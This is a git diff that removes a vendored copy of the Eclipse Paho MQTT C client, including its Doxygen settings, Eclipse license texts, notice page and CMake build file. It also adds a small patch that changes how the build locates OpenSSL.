-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 1000
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = YES
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/pahologo.png b/thirdparty/paho.mqtt.c/doc/pahologo.png
deleted file mode 100644
index 27f197d..0000000
--- a/thirdparty/paho.mqtt.c/doc/pahologo.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/paho.mqtt.c/edl-v10 b/thirdparty/paho.mqtt.c/edl-v10
deleted file mode 100644
index cf989f1..0000000
--- a/thirdparty/paho.mqtt.c/edl-v10
+++ /dev/null
@@ -1,15 +0,0 @@
-
-Eclipse Distribution License - v 1.0
-
-Copyright (c) 2007, Eclipse Foundation, Inc. and its licensors.
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-
-    Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-    Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-    Neither the name of the Eclipse Foundation, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
diff --git a/thirdparty/paho.mqtt.c/epl-v10 b/thirdparty/paho.mqtt.c/epl-v10
deleted file mode 100644
index 79e486c..0000000
--- a/thirdparty/paho.mqtt.c/epl-v10
+++ /dev/null
@@ -1,70 +0,0 @@
-Eclipse Public License - v 1.0
-
-THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT.
-
-1. DEFINITIONS
-
-"Contribution" means:
-
-a) in the case of the initial Contributor, the initial code and documentation distributed under this Agreement, and
-b) in the case of each subsequent Contributor:
-i) changes to the Program, and
-ii) additions to the Program;
-where such changes and/or additions to the Program originate from and are distributed by that particular Contributor. A Contribution 'originates' from a Contributor if it was added to the Program by such Contributor itself or anyone acting on such Contributor's behalf. Contributions do not include additions to the Program which: (i) are separate modules of software distributed in conjunction with the Program under their own license agreement, and (ii) are not derivative works of the Program.
-"Contributor" means any person or entity that distributes the Program.
-
-"Licensed Patents" mean patent claims licensable by a Contributor which are necessarily infringed by the use or sale of its Contribution alone or when combined with the Program.
-
-"Program" means the Contributions distributed in accordance with this Agreement.
-
-"Recipient" means anyone who receives the Program under this Agreement, including all Contributors.
-
-2. GRANT OF RIGHTS
-
-a) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, distribute and sublicense the Contribution of such Contributor, if any, and such derivative works, in source code and object code form.
-b) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free patent license under Licensed Patents to make, use, sell, offer to sell, import and otherwise transfer the Contribution of such Contributor, if any, in source code and object code form. This patent license shall apply to the combination of the Contribution and the Program if, at the time the Contribution is added by the Contributor, such addition of the Contribution causes such combination to be covered by the Licensed Patents. The patent license shall not apply to any other combinations which include the Contribution. No hardware per se is licensed hereunder.
-c) Recipient understands that although each Contributor grants the licenses to its Contributions set forth herein, no assurances are provided by any Contributor that the Program does not infringe the patent or other intellectual property rights of any other entity. Each Contributor disclaims any liability to Recipient for claims brought by any other entity based on infringement of intellectual property rights or otherwise. As a condition to exercising the rights and licenses granted hereunder, each Recipient hereby assumes sole responsibility to secure any other intellectual property rights needed, if any. For example, if a third party patent license is required to allow Recipient to distribute the Program, it is Recipient's responsibility to acquire that license before distributing the Program.
-d) Each Contributor represents that to its knowledge it has sufficient copyright rights in its Contribution, if any, to grant the copyright license set forth in this Agreement.
-3. REQUIREMENTS
-
-A Contributor may choose to distribute the Program in object code form under its own license agreement, provided that:
-
-a) it complies with the terms and conditions of this Agreement; and
-b) its license agreement:
-i) effectively disclaims on behalf of all Contributors all warranties and conditions, express and implied, including warranties or conditions of title and non-infringement, and implied warranties or conditions of merchantability and fitness for a particular purpose;
-ii) effectively excludes on behalf of all Contributors all liability for damages, including direct, indirect, special, incidental and consequential damages, such as lost profits;
-iii) states that any provisions which differ from this Agreement are offered by that Contributor alone and not by any other party; and
-iv) states that source code for the Program is available from such Contributor, and informs licensees how to obtain it in a reasonable manner on or through a medium customarily used for software exchange.
-When the Program is made available in source code form:
-
-a) it must be made available under this Agreement; and
-b) a copy of this Agreement must be included with each copy of the Program.
-Contributors may not remove or alter any copyright notices contained within the Program.
-
-Each Contributor must identify itself as the originator of its Contribution, if any, in a manner that reasonably allows subsequent Recipients to identify the originator of the Contribution.
-
-4. COMMERCIAL DISTRIBUTION
-
-Commercial distributors of software may accept certain responsibilities with respect to end users, business partners and the like. While this license is intended to facilitate the commercial use of the Program, the Contributor who includes the Program in a commercial product offering should do so in a manner which does not create potential liability for other Contributors. Therefore, if a Contributor includes the Program in a commercial product offering, such Contributor ("Commercial Contributor") hereby agrees to defend and indemnify every other Contributor ("Indemnified Contributor") against any losses, damages and costs (collectively "Losses") arising from claims, lawsuits and other legal actions brought by a third party against the Indemnified Contributor to the extent caused by the acts or omissions of such Commercial Contributor in connection with its distribution of the Program in a commercial product offering. The obligations in this section do not apply to any claims or Losses relating to any actual or alleged intellectual property infringement. In order to qualify, an Indemnified Contributor must: a) promptly notify the Commercial Contributor in writing of such claim, and b) allow the Commercial Contributor to control, and cooperate with the Commercial Contributor in, the defense and any related settlement negotiations. The Indemnified Contributor may participate in any such claim at its own expense.
-
-For example, a Contributor might include the Program in a commercial product offering, Product X. That Contributor is then a Commercial Contributor. If that Commercial Contributor then makes performance claims, or offers warranties related to Product X, those performance claims and warranties are such Commercial Contributor's responsibility alone. Under this section, the Commercial Contributor would have to defend claims against the other Contributors related to those performance claims and warranties, and if a court requires any other Contributor to pay any damages as a result, the Commercial Contributor must pay those damages.
-
-5. NO WARRANTY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each Recipient is solely responsible for determining the appropriateness of using and distributing the Program and assumes all risks associated with its exercise of rights under this Agreement , including but not limited to the risks and costs of program errors, compliance with applicable laws, damage to or loss of data, programs or equipment, and unavailability or interruption of operations.
-
-6. DISCLAIMER OF LIABILITY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
-
-7. GENERAL
-
-If any provision of this Agreement is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this Agreement, and without further action by the parties hereto, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable.
-
-If Recipient institutes patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Program itself (excluding combinations of the Program with other software or hardware) infringes such Recipient's patent(s), then such Recipient's rights granted under Section 2(b) shall terminate as of the date such litigation is filed.
-
-All Recipient's rights under this Agreement shall terminate if it fails to comply with any of the material terms or conditions of this Agreement and does not cure such failure in a reasonable period of time after becoming aware of such noncompliance. If all Recipient's rights under this Agreement terminate, Recipient agrees to cease use and distribution of the Program as soon as reasonably practicable. However, Recipient's obligations under this Agreement and any licenses granted by Recipient relating to the Program shall continue and survive.
-
-Everyone is permitted to copy and distribute copies of this Agreement, but in order to avoid inconsistency the Agreement is copyrighted and may only be modified in the following manner. The Agreement Steward reserves the right to publish new versions (including revisions) of this Agreement from time to time. No one other than the Agreement Steward has the right to modify this Agreement. The Eclipse Foundation is the initial Agreement Steward. The Eclipse Foundation may assign the responsibility to serve as the Agreement Steward to a suitable separate entity. Each new version of the Agreement will be given a distinguishing version number. The Program (including Contributions) may always be distributed subject to the version of the Agreement under which it was received. In addition, after a new version of the Agreement is published, Contributor may elect to distribute the Program (including its Contributions) under the new version. Except as expressly stated in Sections 2(a) and 2(b) above, Recipient receives no rights or licenses to the intellectual property of any Contributor under this Agreement, whether expressly, by implication, estoppel or otherwise. All rights in the Program not expressly granted under this Agreement are reserved.
-
-This Agreement is governed by the laws of the State of New York and the intellectual property laws of the United States of America. No party to this Agreement will bring a legal action under this Agreement more than one year after the cause of action arose. Each party waives its rights to a jury trial in any resulting litigation.
diff --git a/thirdparty/paho.mqtt.c/notice.html b/thirdparty/paho.mqtt.c/notice.html
deleted file mode 100644
index f19c483..0000000
--- a/thirdparty/paho.mqtt.c/notice.html
+++ /dev/null
@@ -1,108 +0,0 @@
-<?xml version="1.0" encoding="ISO-8859-1" ?>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
-<title>Eclipse Foundation Software User Agreement</title>
-</head>
-
-<body lang="EN-US">
-<h2>Eclipse Foundation Software User Agreement</h2>
-<p>February 1, 2011</p>
-
-<h3>Usage Of Content</h3>
-
-<p>THE ECLIPSE FOUNDATION MAKES AVAILABLE SOFTWARE, DOCUMENTATION, INFORMATION AND/OR OTHER MATERIALS FOR OPEN SOURCE PROJECTS
-   (COLLECTIVELY &quot;CONTENT&quot;).  USE OF THE CONTENT IS GOVERNED BY THE TERMS AND CONDITIONS OF THIS AGREEMENT AND/OR THE TERMS AND
-   CONDITIONS OF LICENSE AGREEMENTS OR NOTICES INDICATED OR REFERENCED BELOW.  BY USING THE CONTENT, YOU AGREE THAT YOUR USE
-   OF THE CONTENT IS GOVERNED BY THIS AGREEMENT AND/OR THE TERMS AND CONDITIONS OF ANY APPLICABLE LICENSE AGREEMENTS OR
-   NOTICES INDICATED OR REFERENCED BELOW.  IF YOU DO NOT AGREE TO THE TERMS AND CONDITIONS OF THIS AGREEMENT AND THE TERMS AND
-   CONDITIONS OF ANY APPLICABLE LICENSE AGREEMENTS OR NOTICES INDICATED OR REFERENCED BELOW, THEN YOU MAY NOT USE THE CONTENT.</p>
-
-<h3>Applicable Licenses</h3>
-
-<p>Unless otherwise indicated, all Content made available by the Eclipse Foundation is provided to you under the terms and conditions of the Eclipse Public License Version 1.0
-   (&quot;EPL&quot;).  A copy of the EPL is provided with this Content and is also available at <a href="http://www.eclipse.org/legal/epl-v10.html">http://www.eclipse.org/legal/epl-v10.html</a>.
-   For purposes of the EPL, &quot;Program&quot; will mean the Content.</p>
-
-<p>Content includes, but is not limited to, source code, object code, documentation and other files maintained in the Eclipse Foundation source code
-   repository (&quot;Repository&quot;) in software modules (&quot;Modules&quot;) and made available as downloadable archives (&quot;Downloads&quot;).</p>
-
-<ul>
-       <li>Content may be structured and packaged into modules to facilitate delivering, extending, and upgrading the Content.  Typical modules may include plug-ins (&quot;Plug-ins&quot;), plug-in fragments (&quot;Fragments&quot;), and features (&quot;Features&quot;).</li>
-       <li>Each Plug-in or Fragment may be packaged as a sub-directory or JAR (Java&trade; ARchive) in a directory named &quot;plugins&quot;.</li>
-       <li>A Feature is a bundle of one or more Plug-ins and/or Fragments and associated material.  Each Feature may be packaged as a sub-directory in a directory named &quot;features&quot;.  Within a Feature, files named &quot;feature.xml&quot; may contain a list of the names and version numbers of the Plug-ins
-      and/or Fragments associated with that Feature.</li>
-       <li>Features may also include other Features (&quot;Included Features&quot;). Within a Feature, files named &quot;feature.xml&quot; may contain a list of the names and version numbers of Included Features.</li>
-</ul>
-
-<p>The terms and conditions governing Plug-ins and Fragments should be contained in files named &quot;about.html&quot; (&quot;Abouts&quot;). The terms and conditions governing Features and
-Included Features should be contained in files named &quot;license.html&quot; (&quot;Feature Licenses&quot;).  Abouts and Feature Licenses may be located in any directory of a Download or Module
-including, but not limited to the following locations:</p>
-
-<ul>
-       <li>The top-level (root) directory</li>
-       <li>Plug-in and Fragment directories</li>
-       <li>Inside Plug-ins and Fragments packaged as JARs</li>
-       <li>Sub-directories of the directory named &quot;src&quot; of certain Plug-ins</li>
-       <li>Feature directories</li>
-</ul>
-
-<p>Note: if a Feature made available by the Eclipse Foundation is installed using the Provisioning Technology (as defined below), you must agree to a license (&quot;Feature Update License&quot;) during the
-installation process.  If the Feature contains Included Features, the Feature Update License should either provide you with the terms and conditions governing the Included Features or
-inform you where you can locate them.  Feature Update Licenses may be found in the &quot;license&quot; property of files named &quot;feature.properties&quot; found within a Feature.
-Such Abouts, Feature Licenses, and Feature Update Licenses contain the terms and conditions (or references to such terms and conditions) that govern your use of the associated Content in
-that directory.</p>
-
-<p>THE ABOUTS, FEATURE LICENSES, AND FEATURE UPDATE LICENSES MAY REFER TO THE EPL OR OTHER LICENSE AGREEMENTS, NOTICES OR TERMS AND CONDITIONS.  SOME OF THESE
-OTHER LICENSE AGREEMENTS MAY INCLUDE (BUT ARE NOT LIMITED TO):</p>
-
-<ul>
-       <li>Eclipse Distribution License Version 1.0 (available at <a href="http://www.eclipse.org/licenses/edl-v10.html">http://www.eclipse.org/licenses/edl-v1.0.html</a>)</li>
-       <li>Common Public License Version 1.0 (available at <a href="http://www.eclipse.org/legal/cpl-v10.html">http://www.eclipse.org/legal/cpl-v10.html</a>)</li>
-       <li>Apache Software License 1.1 (available at <a href="http://www.apache.org/licenses/LICENSE">http://www.apache.org/licenses/LICENSE</a>)</li>
-       <li>Apache Software License 2.0 (available at <a href="http://www.apache.org/licenses/LICENSE-2.0">http://www.apache.org/licenses/LICENSE-2.0</a>)</li>
-       <li>Metro Link Public License 1.00 (available at <a href="http://www.opengroup.org/openmotif/supporters/metrolink/license.html">http://www.opengroup.org/openmotif/supporters/metrolink/license.html</a>)</li>
-       <li>Mozilla Public License Version 1.1 (available at <a href="http://www.mozilla.org/MPL/MPL-1.1.html">http://www.mozilla.org/MPL/MPL-1.1.html</a>)</li>
-</ul>
-
-<p>IT IS YOUR OBLIGATION TO READ AND ACCEPT ALL SUCH TERMS AND CONDITIONS PRIOR TO USE OF THE CONTENT.  If no About, Feature License, or Feature Update License is provided, please
-contact the Eclipse Foundation to determine what terms and conditions govern that particular Content.</p>
-
-
-<h3>Use of Provisioning Technology</h3>
-
-<p>The Eclipse Foundation makes available provisioning software, examples of which include, but are not limited to, p2 and the Eclipse
-   Update Manager (&quot;Provisioning Technology&quot;) for the purpose of allowing users to install software, documentation, information and/or
-   other materials (collectively &quot;Installable Software&quot;). This capability is provided with the intent of allowing such users to
-   install, extend and update Eclipse-based products. Information about packaging Installable Software is available at <a
-       href="http://eclipse.org/equinox/p2/repository_packaging.html">http://eclipse.org/equinox/p2/repository_packaging.html</a>
-   (&quot;Specification&quot;).</p>
-
-<p>You may use Provisioning Technology to allow other parties to install Installable Software. You shall be responsible for enabling the
-   applicable license agreements relating to the Installable Software to be presented to, and accepted by, the users of the Provisioning Technology
-   in accordance with the Specification. By using Provisioning Technology in such a manner and making it available in accordance with the
-   Specification, you further acknowledge your agreement to, and the acquisition of all necessary rights to permit the following:</p>
-
-<ol>
-       <li>A series of actions may occur (&quot;Provisioning Process&quot;) in which a user may execute the Provisioning Technology
-       on a machine (&quot;Target Machine&quot;) with the intent of installing, extending or updating the functionality of an Eclipse-based
-       product.</li>
-       <li>During the Provisioning Process, the Provisioning Technology may cause third party Installable Software or a portion thereof to be
-       accessed and copied to the Target Machine.</li>
-       <li>Pursuant to the Specification, you will provide to the user the terms and conditions that govern the use of the Installable
-       Software (&quot;Installable Software Agreement&quot;) and such Installable Software Agreement shall be accessed from the Target
-       Machine in accordance with the Specification. Such Installable Software Agreement must inform the user of the terms and conditions that govern
-       the Installable Software and must solicit acceptance by the end user in the manner prescribed in such Installable Software Agreement. Upon such
-       indication of agreement by the user, the provisioning Technology will complete installation of the Installable Software.</li>
-</ol>
-
-<h3>Cryptography</h3>
-
-<p>Content may contain encryption software. The country in which you are currently may have restrictions on the import, possession, and use, and/or re-export to
-   another country, of encryption software. BEFORE using any encryption software, please check the country's laws, regulations and policies concerning the import,
-   possession, or use, and re-export of encryption software, to see if this is permitted.</p>
-
-<p><small>Java and all Java-based trademarks are trademarks of Oracle Corporation in the United States, other countries, or both.</small></p>
-</body>
-</html>
diff --git a/thirdparty/paho.mqtt.c/paho.mqtt.c.patch b/thirdparty/paho.mqtt.c/paho.mqtt.c.patch
new file mode 100644
index 0000000..d37c66c
--- /dev/null
+++ b/thirdparty/paho.mqtt.c/paho.mqtt.c.patch
@@ -0,0 +1,60 @@
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 0ce3649..3981b6b 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -23,7 +23,7 @@ MESSAGE(STATUS "CMake version: " ${CMAKE_VERSION})
+ MESSAGE(STATUS "CMake system name: " ${CMAKE_SYSTEM_NAME})
+ 
+ SET(CMAKE_SCRIPTS "${CMAKE_SOURCE_DIR}/cmake")
+-SET(CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules")
++list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules")
+ 
+ ## build settings
+ SET(PAHO_VERSION_MAJOR 1)
+diff --git a/src/CMakeLists.txt b/src/CMakeLists.txt
+index c57185b..3d0c2c7 100644
+--- a/src/CMakeLists.txt
++++ b/src/CMakeLists.txt
+@@ -101,27 +101,12 @@ INSTALL(FILES MQTTAsync.h MQTTClient.h MQTTClientPersistence.h
+     DESTINATION ${CMAKE_INSTALL_INCLUDEDIR})
+ 
+ IF (PAHO_WITH_SSL)
+-    SET(OPENSSL_SEARCH_PATH "" CACHE PATH "Directory containing OpenSSL libraries and includes")
++    FIND_PACKAGE(OpenSSL REQUIRED)
+ 
+-    IF (${CMAKE_SYSTEM_NAME} STREQUAL "Darwin")
+-      SET(OPENSSL_SEARCH_PATH "/usr/local/opt/openssl")
+-    ENDIF (${CMAKE_SYSTEM_NAME} STREQUAL "Darwin")
+-
+-    IF (WIN32)
+-      SET(OPENSSL_SEARCH_PATH "C:/OpenSSL-Win64")
+-    ENDIF ()
+-
+-    FIND_PATH(OPENSSL_INCLUDE_DIR openssl/ssl.h
+-        HINTS ${OPENSSL_SEARCH_PATH}/include)
+-    FIND_LIBRARY(OPENSSL_LIB NAMES ssl libssl ssleay32
+-        HINTS ${OPENSSL_SEARCH_PATH}/lib ${OPENSSL_SEARCH_PATH}/lib64)
+-    FIND_LIBRARY(OPENSSLCRYPTO_LIB NAMES crypto libcrypto libeay32
+-      	HINTS ${OPENSSL_SEARCH_PATH}/lib ${OPENSSL_SEARCH_PATH}/lib64)
+-
+-    MESSAGE(STATUS "OpenSSL hints: ${OPENSSL_SEARCH_PATH}")
+     MESSAGE(STATUS "OpenSSL headers found at ${OPENSSL_INCLUDE_DIR}")
+-    MESSAGE(STATUS "OpenSSL library found at ${OPENSSL_LIB}")
+-    MESSAGE(STATUS "OpenSSL Crypto library found at ${OPENSSLCRYPTO_LIB}")
++    MESSAGE(STATUS "OpenSSL libraries found at ${OPENSSL_LIBRARIES}")
++    MESSAGE(STATUS "OpenSSL SSL library found at ${OPENSSL_SSL_LIBRARY}")
++    MESSAGE(STATUS "OpenSSL Crypto library found at ${OPENSSL_CRYPTO_LIBRARY}")
+ 
+     INCLUDE_DIRECTORIES(
+         ${OPENSSL_INCLUDE_DIR}
+@@ -135,8 +120,8 @@ IF (PAHO_WITH_SSL)
+     ADD_LIBRARY(paho-mqtt3cs SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTClient.c SSLSocket.c)
+     ADD_LIBRARY(paho-mqtt3as SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTAsync.c SSLSocket.c)
+ 
+-    TARGET_LINK_LIBRARIES(paho-mqtt3cs ${OPENSSL_LIB} ${OPENSSLCRYPTO_LIB} ${LIBS_SYSTEM})
+-    TARGET_LINK_LIBRARIES(paho-mqtt3as ${OPENSSL_LIB} ${OPENSSLCRYPTO_LIB} ${LIBS_SYSTEM})
++    TARGET_LINK_LIBRARIES(paho-mqtt3cs ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
++    TARGET_LINK_LIBRARIES(paho-mqtt3as ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
+     SET_TARGET_PROPERTIES(
+         paho-mqtt3cs paho-mqtt3as PROPERTIES
+         VERSION ${CLIENT_VERSION}
diff --git a/thirdparty/paho.mqtt.c/src/CMakeLists.txt b/thirdparty/paho.mqtt.c/src/CMakeLists.txt
deleted file mode 100644
index b412002..0000000
--- a/thirdparty/paho.mqtt.c/src/CMakeLists.txt
+++ /dev/null
@@ -1,148 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015, 2017 logi.cals GmbH and others
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Rainer Poisel - initial version
-#     Ian Craggs (IBM Corp.) - merge master
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-## compilation/linkage settings
-INCLUDE_DIRECTORIES(
-    .
-    ${CMAKE_BINARY_DIR}
-    )
-
-CONFIGURE_FILE(VersionInfo.h.in
-    ${CMAKE_BINARY_DIR}/VersionInfo.h
-    @ONLY
-    )
-
-SET(common_src
-    MQTTProtocolClient.c
-    Clients.c
-    utf-8.c
-    StackTrace.c
-    MQTTPacket.c
-    MQTTPacketOut.c
-    Messages.c
-    Tree.c
-    Socket.c
-    Log.c
-    MQTTPersistence.c
-    Thread.c
-    MQTTProtocolOut.c
-    MQTTPersistenceDefault.c
-    SocketBuffer.c
-    Heap.c
-    LinkedList.c
-    )
-
-IF (WIN32)
-    SET(LIBS_SYSTEM ws2_32)
-ELSEIF (UNIX)
-    IF(CMAKE_SYSTEM_NAME MATCHES "Linux")
-        SET(LIBS_SYSTEM c dl pthread)
-    ELSEIF (CMAKE_SYSTEM_NAME MATCHES "FreeBSD")
-        SET(LIBS_SYSTEM compat pthread)
-    ELSE()
-        SET(LIBS_SYSTEM c pthread)
-    ENDIF()
-ENDIF()
-
-
-## common compilation for libpaho-mqtt3c and libpaho-mqtt3a
-ADD_LIBRARY(common_obj OBJECT ${common_src})
-SET_PROPERTY(TARGET common_obj PROPERTY POSITION_INDEPENDENT_CODE ON)
-
-ADD_EXECUTABLE(MQTTVersion MQTTVersion.c)
-
-ADD_LIBRARY(paho-mqtt3c SHARED $<TARGET_OBJECTS:common_obj> MQTTClient.c)
-ADD_LIBRARY(paho-mqtt3a SHARED $<TARGET_OBJECTS:common_obj> MQTTAsync.c)
-
-TARGET_LINK_LIBRARIES(paho-mqtt3c ${LIBS_SYSTEM})
-TARGET_LINK_LIBRARIES(paho-mqtt3a ${LIBS_SYSTEM})
-
-TARGET_LINK_LIBRARIES(MQTTVersion paho-mqtt3a paho-mqtt3c ${LIBS_SYSTEM})
-SET_TARGET_PROPERTIES(
-    paho-mqtt3c paho-mqtt3a PROPERTIES
-    VERSION ${CLIENT_VERSION}
-    SOVERSION ${PAHO_VERSION_MAJOR})
-
-INSTALL(TARGETS paho-mqtt3c paho-mqtt3a
-    ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}
-    LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR}
-    RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR})
-INSTALL(TARGETS MQTTVersion
-    RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR})
-
-IF (PAHO_BUILD_STATIC)
-    ADD_LIBRARY(paho-mqtt3c-static STATIC $<TARGET_OBJECTS:common_obj> MQTTClient.c)
-    ADD_LIBRARY(paho-mqtt3a-static STATIC $<TARGET_OBJECTS:common_obj> MQTTAsync.c)
-
-    TARGET_LINK_LIBRARIES(paho-mqtt3c-static ${LIBS_SYSTEM})
-    TARGET_LINK_LIBRARIES(paho-mqtt3a-static ${LIBS_SYSTEM})
-
-    INSTALL(TARGETS paho-mqtt3c-static paho-mqtt3a-static
-        ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR})
-ENDIF()
-
-INSTALL(FILES MQTTAsync.h MQTTClient.h MQTTClientPersistence.h
-    DESTINATION ${CMAKE_INSTALL_INCLUDEDIR})
-
-IF (PAHO_WITH_SSL)
-    MESSAGE(STATUS "OpenSSL headers found at ${OPENSSL_INCLUDE_DIR}")
-    MESSAGE(STATUS "OpenSSL libraries found at ${OPENSSL_LIBRARIES}")
-    MESSAGE(STATUS "OpenSSL Crypto library found at ${OPENSSL_CRYPTO_LIBRARY}")
-    MESSAGE(STATUS "OpenSSL SSL library found at ${OPENSSL_SSL_LIBRARY}")
-
-    INCLUDE_DIRECTORIES(
-        ${OPENSSL_INCLUDE_DIR}
-    )
-
-    ## common compilation for libpaho-mqtt3cs and libpaho-mqtt3as
-    ## Note: SSL libraries must be recompiled due ifdefs
-    ADD_LIBRARY(common_ssl_obj OBJECT ${common_src})
-    SET_PROPERTY(TARGET common_ssl_obj PROPERTY POSITION_INDEPENDENT_CODE ON)
-    SET_PROPERTY(TARGET common_ssl_obj PROPERTY COMPILE_DEFINITIONS "OPENSSL=1")
-    ADD_LIBRARY(paho-mqtt3cs SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTClient.c SSLSocket.c)
-    ADD_LIBRARY(paho-mqtt3as SHARED $<TARGET_OBJECTS:common_ssl_obj> MQTTAsync.c SSLSocket.c)
-
-    TARGET_LINK_LIBRARIES(paho-mqtt3cs ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
